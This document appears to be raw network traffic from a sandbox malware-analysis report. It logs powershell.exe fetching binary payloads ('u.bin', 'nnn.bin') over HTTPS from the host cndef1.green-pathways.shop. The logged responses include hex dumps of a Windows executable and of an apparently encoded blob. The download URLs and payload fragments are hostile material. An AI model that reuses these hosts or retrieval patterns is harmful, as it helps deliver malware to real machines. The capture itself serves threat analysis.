2024-12-17 07:38:26 UTC	16320	IN	Data Raw: ca 3d a6 12 b6 29 44 35 35 33 72 b6 4f da 75 61 64 fe fe 9a 88 a6 2e 2e 6c 2d 6f 18 36 0d c5 30 0c 55 f4 ab 3b b6 06 4b 0b 03 eb 17 fa 37 a5 a8 f5 a7 75 6f b7 26 85 d9 89 84 a5 07 64 7f af a9 77 8b f5 9b c5 b6 9d 4a 77 a1 e4 2d 93 db 73 58 2d c9 90 43 aa 66 c9 21 39 ec 0b ad 9e 1d 6e 3b 2d 29 86 3c 32 68 68 b2 64 19 16 3b e3 31 2c c9 77 5e e8 ca 09 5f 58 a6 8d 9c d1 1a 0f 29 7d 47 44 8b 9d 48 18 3e 55 9f bd bf f9 b5 c2 ea b6 21 df fa 83 0d 55 92 b6 a4 b0 d1 a7 b0 5a a2 68 b2 d3 28 dd ec c8 32 5a 0f da 3c a7 59 ba a5 19 96 68 18 ec 64 ca 54 0c 5d 50 e5 39 f9 ed c5 67 5a 15 cd 28 3c db 51 52 dd 67 69 6c 82 64 53 91 83 86 2c ac 5d 36 bc 2f 3d 9c 31 5f 5d fd 9c 35 e4 17 ab 0b 65 9d 9d 49 19 13 7b f8 6f b1 38 0f b7 c4 78 a3 f4 4c 13 5f 6e 5d 1a c0 98 cf 69 80 Data Ascii: =)D553rOuad..l-o60U;K7uo&dwJw-sX-Cf!9n;-)<2hhd;1,w^_X)}GDH>U!UZh(2Z<YhdT]P9gZ(<QRgildS,]6/=1_]5eI{o8xL_n]i
2024-12-17 07:38:26 UTC	16320	IN	Data Raw: 47 ca c7 b8 96 25 44 89 59 c5 0d b2 85 33 0c 6e 9e c8 b8 3f a3 7d 1e 0c a6 5e 05 74 c9 40 ac ab 85 82 2b 97 79 3f 6f ad 70 48 d3 5c 3d 17 ed 36 9e 93 84 1b 74 46 62 31 71 f0 27 c1 8b 5b c7 3d 0b 06 84 26 73 64 2d ff 44 c9 c4 f0 9c ce 88 1a 74 e0 30 38 5d 33 c9 81 0b c4 9a 1f e6 85 86 12 5c da 86 e6 a5 1a 4c c4 e7 23 0c 7a 29 d6 97 87 99 65 f8 b0 97 61 bc 79 81 1b 69 1a cc 04 97 2a 96 45 57 89 ef 42 81 a3 99 45 cd 9e f9 5d 5c 99 f6 78 2e b7 a4 57 02 7a 89 62 3a e2 4f 65 30 2c 88 cb ae ef c3 a7 fe fb bf a6 a0 e5 79 c9 b6 cb b1 a1 e2 b8 95 e3 5a 67 b1 eb cd 6e e1 f2 21 1b da f8 b1 f1 46 6e 12 19 5a 9e 5d e1 99 4d c8 57 3e ce 01 9a 50 fd 2c e2 a2 3c 37 56 f8 f3 99 71 fd 9c 0c 76 47 51 4f dd 69 56 7d 64 5f 4f 16 ab c6 bd af 21 60 a8 3b 9f d3 93 cb 61 66 8f 30 Data Ascii: G%DY3n?}^t@+y?opH\=6tFb1q'[=&sd-Dt08]3\L#z)eayi*EWBE]\x.Wzb:Oe0,yZgn!FnZ]MW>P,<7VqvGQOiV}d_O!`;af0
2024-12-17 07:38:26 UTC	14681	IN	Data Raw: 6c 79 de fe 9d c5 9e 6b 1d 24 2e 2f bb 2e 9c 14 ba 66 b6 d6 e3 39 97 c5 1f 78 d9 7f 70 2e 7a ac e9 dd 61 39 48 fe d6 e7 56 d8 7d ea f1 a5 43 b9 f3 ab 87 e6 4f 3b b2 ec c3 fe c8 f1 26 53 f2 43 69 37 f9 d0 33 72 db f2 7c cf 14 fb 79 4b 1d df 98 35 7d c1 c2 45 eb 1d 37 ac ff 6a f3 21 6f 9f 14 3a cd f5 98 47 8e 80 9b cf a0 67 24 25 bc f1 fa ab 4b 96 2c fa 62 c5 0a f3 ad 61 5f 9b e5 d9 e9 88 cb 01 ef 63 ae 81 3e ee 91 41 de 91 01 5e 95 bc b2 b3 67 41 6c 7c be b7 6f a0 fb 74 87 46 ce e7 33 73 4c 2f f5 2c 2b a8 2a a7 d4 f2 a8 b5 02 6a b5 90 d6 5c af 3c 7f fe 6c 6f ff b9 81 fe 81 ae 76 63 73 9d b4 bd a1 aa e7 b8 b6 5a c0 f2 f6 70 8d 08 f1 49 8a 09 c9 4e 8d a3 e6 c6 73 69 09 5c 5a 32 87 9a 2e 17 b2 0d 0a 71 8d 84 d5 d7 d5 de 6e 50 1a e4 15 8d 7a 51 8b be aa b3 45 Data Ascii: lyk$./.f9xp.za9HV}CO;&SCi73r\|yK5}E7j!o:Gg$%K,ba_c>A^gAl\|otF3sL/,+*j\<lovcsZpINsi\Z2.qnPzQE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49729	188.114.97.6	443	7036	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:38:26 UTC	194	OUT	GET /api/uz/7552973650/u.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: cndef1.green-pathways.shop Connection: Keep-Alive
2024-12-17 07:38:27 UTC	891	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:38:27 GMT Content-Type: application/octet-stream Content-Length: 893608 Connection: close Last-Modified: Tue, 22 Oct 2024 19:13:21 GMT ETag: "6717f951-da2a8" Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iedy2z2%2FLN8vSSmwE09bz2Hp3d1D0l9sRYXX8WY6ws6BqS9TPhznt76bppelBcKPqwr5JYEqB22vb5rX4PrmvpevnKbCyNxGwH6zq4s%2BKBpaGvuvKS6NOJXUrrPrAzcMbwjAiXWRDAEzbNjdqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3540eea90343d6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2151&min_rtt=2121&rtt_var=817&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=808&delivery_rate=1376709&cwnd=248&unsent_bytes=0&cid=d59d5743a02b80e1&ts=676&x=0"
2024-12-17 07:38:27 UTC	1369	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDRRRCPS_@a_@_@g[j[[jwR+r*S_@SRPSRichR
2024-12-17 07:38:27 UTC	1369	IN	Data Raw: ff 66 89 5e 38 8d 4e 6c c6 46 3a 01 89 5e 3c 89 5e 40 89 46 4c 89 46 50 89 46 54 89 46 58 89 46 5c 89 46 60 89 46 64 e8 82 00 01 00 6a 0d 89 9e 84 00 00 00 89 be 88 00 00 00 8d be 8c 00 00 00 c7 46 7c 55 00 00 00 c7 86 80 00 00 00 90 01 00 00 5b 8b cf e8 55 00 01 00 83 c7 10 4b 79 f3 83 8e 8c 01 00 00 ff 33 c0 83 8e 90 01 00 00 ff 83 8e bc 01 00 00 ff 83 8e c0 01 00 00 ff 89 86 6c 01 00 00 89 86 70 01 00 00 89 86 74 01 00 00 89 86 78 01 00 00 89 86 7c 01 00 00 89 86 80 01 00 00 88 86 84 01 00 00 89 86 88 01 00 00 89 86 94 01 00 00 66 89 86 98 01 00 00 88 86 9a 01 00 00 89 86 9c 01 00 00 89 86 a0 01 00 00 89 86 a4 01 00 00 89 86 ac 01 00 00 89 86 b0 01 00 00 89 86 c4 01 00 00 89 86 c8 01 00 00 89 86 cc 01 00 00 8b c6 5f c6 86 a8 01 00 00 01 5e 5b c3 55 8b Data Ascii: f^8NlF:^<^@FLFPFTFXF\F`FdjF\|U[UKy3lptx\|f_^[U
2024-12-17 07:38:27 UTC	1369	IN	Data Raw: 20 56 ff 15 84 05 49 00 5f 5e 8b e5 5d c2 10 00 ff 77 10 e8 65 94 08 00 33 c0 40 eb eb 55 8b ec 83 ec 0c 57 8b 7d 0c 83 ff ff 74 7f 56 8b 75 14 39 3d 74 78 4c 00 0f 84 98 a2 03 00 a1 64 78 4c 00 85 c0 0f 85 ab a2 03 00 8b 45 18 83 65 f4 00 83 65 fc 00 a3 70 78 4c 00 89 3d 74 78 4c 00 89 35 78 78 4c 00 89 7d f8 83 f8 01 75 65 6a 00 6a 00 8d 4d f4 51 50 56 ff 15 d0 00 49 00 50 ff 75 08 a3 64 78 4c 00 ff 15 ec 00 49 00 80 3d 6c 78 4c 00 00 a3 68 78 4c 00 75 10 ff 75 08 ff 15 28 01 49 00 c6 05 6c 78 4c 00 01 5e 83 7d 10 fe 5f 74 1a 83 7d 10 ff 74 14 6a 00 ff 75 10 e8 2c 0f 00 00 50 ff 75 08 ff 15 ec 00 49 00 8b e5 5d c2 14 00 81 ce 00 00 01 00 eb 93 55 8b ec 80 3d 6c 78 4c 00 00 74 25 ff 75 08 ff 15 d8 00 49 00 83 7d 0c fe c6 05 6c 78 4c 00 00 74 47 83 7d 0c Data Ascii: VI_^]we3@UW}tVu9=txLdxLEeepxL=txL5xxL}uejjMQPVIPudxLI=lxLhxLuu(IlxL^}_t}tju,PuI]U=lxLt%uI}lxLtG}
2024-12-17 07:38:27 UTC	1369	IN	Data Raw: 01 49 00 8b 46 08 8b 58 48 8b 40 4c 85 db 79 46 83 f8 ff 0f 85 74 9f 03 00 85 db 0f 89 6c 9f 03 00 56 57 e8 cd fb ff ff 56 57 8a d8 e8 ce fc ff ff 84 db 75 2e 8b 5c 24 0c 8b 36 e9 33 ff ff ff 8d 44 24 28 50 ff 33 ff 15 2c 06 49 00 5f 5e 5b 8b e5 5d c2 04 00 83 f8 ff 0f 85 2e 9f 03 00 8b c3 eb ad 56 57 e8 a9 a7 08 00 eb c9 55 8b ec ff 75 08 b9 b0 77 4c 00 e8 5b 0d 00 00 8b 55 0c 8b c8 85 d2 74 10 a1 10 78 4c 00 8b 04 88 8b 00 83 78 18 00 75 28 83 0d d8 77 4c 00 ff 8b 45 14 ff 75 10 0f b7 c8 c1 e1 10 0f b7 c2 0b c8 51 6a 06 ff 75 08 ff 15 84 05 49 00 5d c2 10 00 89 0d d8 77 4c 00 eb d7 55 8b ec 53 56 8b 75 08 b9 b0 77 4c 00 57 56 e8 fe 0c 00 00 8b 55 0c 89 45 08 83 f8 ff 0f 84 a2 01 00 00 8b 7d 14 33 c9 8b 5d 10 39 0d 84 78 4c 00 0f 85 c7 9e 03 00 8b 45 0c Data Ascii: IFXH@LyFtlVWVWu.\$63D$(P3,I_^[].VWUuwL[UtxLxu(wLEuQjuI]wLUSVuwLWVUE}3]9xLE
2024-12-17 07:38:27 UTC	1369	IN	Data Raw: 15 14 01 49 00 50 6a 30 56 ff 15 88 06 49 00 39 9f 8c 01 00 00 0f 8d 86 9c 03 00 5f 8b c6 5e 5b 5d c2 30 00 25 ff ff f7 ff eb 98 55 8b ec 83 ec 38 53 56 8b 75 08 57 80 7e 3a 00 0f 85 6d 01 00 00 8b 5d 0c 0f b7 83 86 00 00 00 89 45 ec 8d 45 cc 50 ff 36 ff 15 34 06 49 00 8b 4d d4 8b 45 d8 8b 56 44 8b 7e 48 89 4d 10 89 45 0c 89 55 f8 89 7d 08 85 c9 0f 84 64 9c 03 00 85 c0 0f 84 73 9c 03 00 83 be 9c 01 00 00 00 0f 85 7d 9c 03 00 8d 45 cc 50 ff 33 ff 15 94 06 49 00 8b 45 d4 8b 4d cc 2b c1 8b 55 d8 89 45 f4 8b 45 d0 2b d0 89 45 e8 8d 45 e4 50 ff 36 89 55 f0 89 4d e4 ff 15 70 06 49 00 8b 7d e4 8b c7 0f af 45 f8 8b 75 e8 8b 4d ec 99 f7 7d 10 66 89 83 88 00 00 00 8b c6 0f af 45 08 99 f7 7d 0c 66 89 83 8a 00 00 00 8b 45 f4 0f af 45 f8 99 f7 7d 10 66 89 83 8c 00 00 Data Ascii: IPj0VI9_^[]0%U8SVuW~:m]EEP64IMEVD~HMEU}ds}EP3IEM+UEE+EEP6UMpI}EuM}fE}fEE}f
2024-12-17 07:38:27 UTC	1369	IN	Data Raw: eb f1 8b 4d 0c 01 4a 04 8b 00 8b 40 08 8b e5 5d c2 08 00 51 89 4d f4 c7 45 f8 01 00 00 00 ff 15 48 01 49 00 89 45 fc b9 38 78 4c 00 8d 45 f4 50 e8 ce ee ff ff 8b 45 fc eb d3 55 8b ec 8b 4d 08 83 f9 ff 74 0e 57 8b 7d 0c 83 ff ff 0f 85 4e 9b 03 00 5f 5d c2 08 00 55 8b ec 51 51 53 56 57 8b 7d 08 8d 45 f8 50 8b d9 8b 37 ff 15 bc 05 49 00 8b 45 f8 89 87 6c 01 00 00 8b 45 fc 89 87 70 01 00 00 8d 45 f8 50 56 ff 15 70 06 49 00 8b 4d f8 8b 45 fc 3b 8f 74 01 00 00 75 63 3b 87 78 01 00 00 75 5b ff 73 18 8b 35 f0 05 49 00 ff d6 ff 73 1c 0f b7 c0 c1 e8 0f 89 45 08 ff d6 0f b7 f0 8b 45 08 c1 ee 0f 3b 87 7c 01 00 00 0f 85 61 9b 03 00 83 7d 0c 00 74 06 89 87 7c 01 00 00 3b b7 80 01 00 00 0f 85 b5 9b 03 00 83 7d 0c 00 74 06 89 b7 80 01 00 00 5f 5e 5b 8b e5 5d c2 08 00 83 Data Ascii: MJ@]QMEHIE8xLEPEUMtW}N_]UQQSVW}EP7IElEpEPVpIME;tuc;xu[s5IsEE;\|a}t\|;}t_^[]
2024-12-17 07:38:27 UTC	1369	IN	Data Raw: fb ff 75 05 bb 00 00 ca 80 81 cb 00 00 00 04 b8 00 00 08 00 f7 c3 00 00 01 00 0f 85 d7 01 00 00 f7 c3 00 00 04 00 0f 85 d2 01 00 00 8b 45 20 40 f7 d8 1b c0 23 45 20 89 45 1c a8 40 0f 85 cb 97 03 00 8b 45 10 89 45 20 8b 45 0c 89 45 0c 83 7d 14 ff b9 90 01 00 00 0f 84 a8 01 00 00 83 7d 18 ff 0f 84 a6 01 00 00 83 f8 ff 75 2d 6a 00 8d 45 e8 50 6a 00 6a 30 ff 15 40 07 49 00 6a 07 ff 15 58 05 49 00 8b 4d e8 2b 4d 14 03 4d f0 2b c8 8b c1 99 2b c2 d1 f8 89 45 0c 83 7d 20 ff 75 46 6a 00 8d 45 e8 50 6a 00 6a 30 ff 15 40 07 49 00 6a 08 ff 15 58 05 49 00 8b 4d ec 2b 4d 18 03 4d f4 2b c8 8b c1 99 2b c2 d1 f8 89 45 20 f7 c3 00 00 40 00 74 11 6a 04 ff 15 58 05 49 00 6a fe 99 59 f7 f9 01 45 20 ff 75 18 8d 45 e8 ff 75 14 6a 00 6a 00 50 ff 15 c4 05 49 00 ff 75 1c 8d 45 e8 Data Ascii: uE @#E E@EE EE}}u-jEPjj0@IjXIM+MM++E} uFjEPjj0@IjXIM+MM++E @tjXIjYE uEujjPIuE
2024-12-17 07:38:27 UTC	1369	IN	Data Raw: 03 00 83 fa 0c 0f 84 57 9b 03 00 c6 86 92 00 00 00 50 66 a1 b8 77 4c 00 66 89 86 86 00 00 00 8b 55 1c 8b 45 10 8b 4d 14 8b 7d 18 89 55 fc 8b 55 28 83 e2 02 89 45 ec 89 4d f0 89 7d f8 89 55 d8 0f 85 28 9b 03 00 53 ff 75 1c 57 51 50 e8 f4 f1 ff ff 8b 7b 60 8b 43 58 8b 4b 5c 89 7d f8 8b 7b 64 89 45 ec 89 4d f0 89 7d fc 8b 55 08 8b 7d e0 83 fa 1d 0f 87 84 9f 03 00 c7 45 f4 01 00 00 00 ff 24 95 be 32 40 00 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 57 56 53 e8 97 ed ff ff 8b 55 08 84 c0 0f 84 c9 9d 03 00 8b 4d 28 88 96 90 00 00 00 88 8e 91 00 00 00 a1 1c 78 4c 00 a3 48 78 4c 00 89 3d 44 78 4c 00 f6 c1 01 0f 84 c7 9d 03 00 f6 c1 04 0f 84 15 9e 03 00 83 7d d8 00 75 09 6a 00 56 53 e8 34 ef ff ff 80 bb 98 01 00 00 00 0f 85 e2 9e 03 00 83 7b 50 ff 75 31 Data Ascii: WPfwLfUEM}UU(EM}U(SuWQP{`CXK\}{dEM}U}E$2@u$u uuuuWVSUM(xLHxL=DxL}ujVS4{Pu1
2024-12-17 07:38:27 UTC	1369	IN	Data Raw: 04 00 32 c0 eb d7 56 8b f1 83 7e 04 01 74 16 80 7e 0d 00 57 75 14 80 7e 0c 00 0f 84 d1 9b 03 00 c6 46 0d 01 5f ff 4e 04 5e c3 8b 4e 08 8b 79 10 85 c9 74 06 51 e8 e1 cc 01 00 89 7e 08 c6 46 0d 00 eb d3 83 79 04 02 75 03 8b 01 c3 80 79 0d 00 8b 41 08 8b 40 10 74 f3 8b 40 10 c3 83 79 04 01 75 03 8b 01 c3 80 79 0d 00 8b 41 08 74 f6 8b 40 10 c3 55 8b ec 56 8b f1 83 7e 04 00 75 12 ff 75 08 8b 0e e8 ec 1a 00 00 ff 46 04 5e 5d c2 04 00 80 7e 0d 00 75 29 57 6a 18 e8 80 d8 01 00 8b f8 59 85 ff 74 2b ff 75 08 83 67 08 00 8b cf e8 e5 16 00 00 8b 46 08 89 47 10 89 7e 08 5f eb c9 ff 75 08 8b 4e 08 e8 aa 1a 00 00 c6 46 0d 00 eb b8 33 ff eb df 55 8b ec dd 45 10 83 ec 10 d9 ee dd e1 df e0 f6 c4 44 7b 77 dd 05 70 5b 4a 00 dd ea df e0 f6 c4 44 7b 68 d9 c9 53 dd 55 f0 56 57 Data Ascii: 2V~t~Wu~F_N^NytQ~FyuyA@t@yuyAt@UV~uuF^]~u)WjYt+ugFG~_uNF3UED{wp[JD{hSUVW
2024-12-17 07:38:27 UTC	711	IN	Data Raw: de 8b c6 eb d8 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 10 56 8b 75 0c 83 3e 00 0f 84 ce 01 00 00 a1 40 84 4c 00 c6 45 0f 00 a8 01 0f 84 0d 02 00 00 53 c7 05 60 84 4c 00 00 00 00 00 c7 05 5c 84 4c 00 00 00 00 00 c7 45 f4 44 84 4c 00 c7 45 f8 44 84 4c 00 57 8b 45 08 8b 16 8b 58 04 8b 4a 04 85 db 0f 84 b8 97 03 00 85 c9 0f 84 b8 97 03 00 3b d9 0f 82 30 01 00 00 8b 0a 8b fb 8b 10 85 ff 74 11 66 8b 02 66 3b 01 75 0d 83 c2 02 83 c1 02 4f 75 ef 33 c0 eb 06 1b c0 83 e0 fe 40 8b 16 85 c0 78 4e 7e 48 8b 45 08 8b 52 1c 85 d2 0f 85 a8 00 00 00 8a 5d 0f 8b 06 8b 4d f8 8b 55 f4 5f 8b 40 18 89 41 1c 8a c3 8b 0e 5b 8b 49 1c 89 4a 18 8b 16 8b 0d 60 84 4c 00 89 4a 18 8b 16 8b 0d 5c 84 4c 00 5e 89 4a 1c 8b e5 5d c2 08 00 b3 01 eb c5 8b 52 18 85 d2 74 bb 8b 42 04 3b d8 Data Ascii: UVu>@LES`L\LEDLEDLWEXJ;0tff;uOu3@xN~HER]MU_@A[IJ`LJ\L^J]RtB;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49772	188.114.97.6	443	7036	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:38:39 UTC	172	OUT	GET /api/uz/7552973650/nnn.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: cndef1.green-pathways.shop
2024-12-17 07:38:40 UTC	903	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:38:40 GMT Content-Type: application/octet-stream Content-Length: 963397 Connection: close Last-Modified: Fri, 29 Nov 2024 16:04:11 GMT ETag: "6749e5fb-eb345" Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5x27EYjNTl5HcLaSaBOUguvcNYPNEK%2BK3A1Iw66pFpliw80xEp01xw%2FjEv23%2BGy4oXECGn1W%2BEdfMgwTVRiKxnBYWkT1%2BjIqZQ2VEIzjO9s%2BOnBAobx6rljZ60TszpZhiA%2B%2FTqorslLn83lQQg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f35413f6bc64288-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1605&rtt_var=614&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=810&delivery_rate=1764350&cwnd=245&unsent_bytes=0&cid=684cac4ef053e737&ts=675&x=0"
2024-12-17 07:38:40 UTC	466	IN	Data Raw: 4c 35 65 df dc dc dc aa ab ad b6 88 96 af bd 8a 89 be af 9f bd ae 9b be 91 a6 98 b2 b4 ac bb aa ba 89 b6 9f 8d 8a 90 aa bd 9b 8a b2 af 90 8e b3 b3 99 b0 9b b0 b1 a6 95 be 9d a4 98 8b 88 85 aa 98 b8 b1 a6 99 9a aa 9b ba 94 8a ac bd 9b a6 b0 8d b4 8b 96 a4 9f ba 9e 9f a9 a5 8d 91 96 af aa bb 98 8b b2 bb 85 b7 95 b9 b0 95 ac 9b 91 9f 9a b7 b3 95 9d 84 af b1 bb ac 8d af 99 86 9b 86 bd 8e 98 aa 9b 88 bd 96 a4 be ae 95 96 9d 9b aa b4 ae b1 ba ab 8d b5 8e ae 8f 9b 88 98 a5 9e a9 9e 8b 8a a9 bd b5 b1 91 b2 98 b3 ab 88 aa 8f b7 ae b1 be a5 aa ba 85 b6 ac a5 8b 8d 9e a8 bb 8c b5 90 b7 b9 a8 b6 9b 9e 95 bd ab 9e a4 a4 8b 8c 99 b8 b3 a5 84 97 b6 8c 9d bf bd 85 ac b1 b7 b3 84 97 96 b1 b1 b8 9f a4 98 ae a4 a5 b8 b5 ad 88 be bb a9 a8 ba aa 97 a4 8e b8 ae bb 8c bf aa 99 Data Ascii: L5e
2024-12-17 07:38:40 UTC	1369	IN	Data Raw: b5 9a bf b8 bf ac 98 af 8f b3 8a ae bd b0 85 aa b9 ad 94 b6 ba 9d 84 8a bb a5 99 96 90 88 bd 90 92 ac ab b4 9e 9a 85 94 ba be 92 94 98 88 a8 84 a4 8f 85 b4 a9 a8 95 93 b5 af 8b 9b b0 b1 93 ac 9b a9 b1 88 b5 b1 af 97 af b3 93 b4 99 a4 a5 b9 84 b5 b7 94 9d 85 86 bf aa 8d 9a 88 8a b7 9d bb b5 8c b4 94 af ad 95 bf 98 91 8f be 9d bf ac 8d be b4 b0 b9 92 8c 84 98 9a a8 aa a8 89 b9 be ae ac 8a 93 af 8f b2 a5 aa 90 b6 b0 a6 9f 9b bf 8f 9a ad 8f b3 92 97 b6 ab a6 98 9f 86 bd 85 ae 97 ab 8c 9b ac 9a 8f 84 90 8c a4 9e 94 97 86 86 9a b9 97 93 98 a8 89 84 88 8c bf 99 9a 89 8f 98 92 9e be bf b2 88 b6 bd ba 8e a6 8e 98 96 91 9a b6 ab 85 98 95 90 88 b6 aa ae 9f 9f 86 8a 9d 86 91 bf 93 ae a4 b6 95 b9 88 8e ac 98 b3 bf ae a4 ab bb ae 95 8c b7 a5 ab 90 8f 8f 8c 8b b7 9d 86 Data Ascii:
2024-12-17 07:38:40 UTC	1369	IN	Data Raw: b7 b8 ad aa 98 88 9d 95 a5 97 86 b2 89 9d 8b b9 92 b5 99 ad 92 99 bf ab ba 98 89 8f b7 b9 b3 93 ab b7 ad 8d 95 b9 bd 86 89 89 be 9a a5 b1 90 a4 96 a5 9b b3 9a a8 b0 b2 9d 97 a5 b4 b1 9b 8f ab 9e b2 ae a9 90 98 84 8f 8a a6 84 a8 bb b8 b7 b8 bd 89 8d 4c 35 65 df dc dc dc aa 8e 94 bf b7 a9 84 be 85 98 a8 91 a4 9d 89 be b0 90 b5 ba 90 88 88 8b 94 b8 bd 8f ad b1 aa 91 bf a6 b8 ac b6 86 96 a6 ae aa 99 84 a6 b8 b9 b5 a8 94 94 a8 99 aa 96 8e aa be 90 8a b5 bd a9 90 9a ab bb 92 92 9f bf a4 be a9 ba 93 94 9e b3 b7 8d af 89 9b 8a bd bf bb 8d a9 99 93 be 86 ad 94 a9 99 94 91 a4 ba b6 89 9b 8e a5 b1 89 b6 86 b2 93 aa 98 a5 9f b5 ae 8a bb 8e 96 a6 84 95 91 ab b8 9a 9a 9b 8a b9 ba 9d 98 b1 8a 8f 8d b3 b1 94 8d 86 9d a6 a9 91 8e bd aa b4 88 99 98 a6 99 ae 9a 92 b7 90 93 Data Ascii: L5e
2024-12-17 07:38:40 UTC	1369	IN	Data Raw: b1 9f b2 92 96 8e a5 a4 b7 af b8 ac b6 9d 86 b8 ad 84 9d b9 ab ab 9d b4 ae af 9e 99 be b9 b4 86 84 a8 ae ad 84 ae 9a 92 b9 9d ac a4 ab a5 b3 8c 97 9e 97 a8 bf 8c b9 b8 90 98 b1 a4 ba 91 b7 9d a4 8d ae 91 a4 99 9a 91 b7 90 aa 92 a5 97 b3 9d b5 8e 8c ab a5 a9 ab a8 8e b9 a6 86 af b3 ab 9d a6 8c 8c 8b 94 b1 98 af b9 b9 90 b6 91 85 98 9f a6 86 b2 b9 9e 85 bd 8c bf 84 ad 91 a8 b3 9f 8f ae b4 94 b9 ac 9a 8e 9e af b9 a6 a8 9f b4 a5 8d 85 86 be a9 a4 88 a6 bd 90 99 97 bd 95 ab 8a 8b 8f 98 ad 94 9e 99 8a b1 90 99 89 93 be b2 86 91 9f 92 a6 95 92 ba 92 92 a9 93 9a 8a a6 99 95 96 a6 95 96 ad 93 92 9e a6 84 8e b5 95 b4 a6 8e b7 95 b8 a6 9d ac ac 8f 92 98 93 89 b3 86 91 9a 9e b3 8a bf ba 8d ae 9a b1 8a a6 a8 84 95 bb aa 96 aa 9b ad 8c b2 91 b9 93 84 b4 a4 90 ba bd b2 Data Ascii:
2024-12-17 07:38:40 UTC	1369	IN	Data Raw: 8b 8f ad b8 a8 86 aa b5 91 98 86 95 99 b3 bf ab 8c a6 ad b1 90 9b ad b5 af 96 89 8e bd a4 86 84 8c 84 b3 91 b8 91 91 ba 91 b3 b0 be bf 8d 96 b6 b4 94 94 8e ae 94 bb 98 99 86 8a ab 8e b3 b8 99 9f 93 8b b0 95 99 b0 90 95 98 95 ad 95 9d 99 af b2 ba b0 b1 b0 ae 98 99 97 9b a6 b4 88 98 97 99 bd 9d a5 bf b2 89 89 ba ae b3 86 92 88 9a b2 aa 8c 8d ba 92 b8 b7 9f aa be 8b 85 94 86 a6 86 b2 bf af a8 97 91 8d 8b bd b8 8f 91 be ab 94 88 86 a8 93 8c 99 af 98 be 84 a8 8a 94 ba b3 9e 94 ba 99 9b 99 95 90 ad 96 85 94 ac a9 b1 ae 9d b7 84 9b ba bb 8b a8 99 b6 93 b9 bb 9b bb b4 a5 be 8e a6 90 a9 ad 98 b2 99 b5 a5 b0 b2 85 8f ab 96 ae b7 85 a8 89 bb b1 b3 b7 bd 97 84 91 b0 aa 4c 35 65 df dc dc dc 92 b8 85 89 aa af ac a6 b2 a6 b7 a6 8f 94 89 af 93 8b 98 8f 99 b8 9f 8a 8d 8f Data Ascii: L5e
2024-12-17 07:38:40 UTC	1369	IN	Data Raw: b7 95 86 a9 91 93 88 94 9f 98 a6 b0 8f a9 9e 9b ab 9f be b2 89 ac bb ba 88 ba a4 92 af 93 ac 8f 9a b6 8b 96 be ba 95 b1 8c 8d bf ae 93 86 84 b3 9a 92 b4 ab af 86 ad a8 99 b2 b7 88 90 bf 84 9e 97 8a 8c 84 9f ba be b8 a4 a6 a6 b1 b1 93 b9 ba 98 8f a6 88 84 be a4 aa 96 bd 97 9b b2 8a b3 88 94 b4 8a af 93 9e 94 9a 8f 91 99 bf 98 8e b4 a6 b0 92 99 9f b3 95 90 af be 89 98 97 b5 97 93 93 9a 8b a5 ba 8a 9b 95 b2 8f bd a9 a5 ad b1 aa b1 ab b5 92 9e 9a 97 8f ad 89 92 8d a8 8d 93 bf a4 95 ba a4 9b 8e b7 89 ad 97 bd ad 8a b7 b9 b1 9e bd 9e b6 be 8a aa b5 b3 bf 95 92 9a 8e a5 97 9f 88 b1 90 a5 ba 9e 95 8b ba 97 b9 a8 b7 9d b8 85 90 b8 8f aa 88 9a 98 b9 95 86 be 86 bd b4 a6 b9 b7 90 8a ad be ab 84 b4 b2 ad 91 9d a4 99 aa a6 ad 8c 99 b7 8a 99 9e a6 a9 ae 99 91 ae b0 b0 Data Ascii:
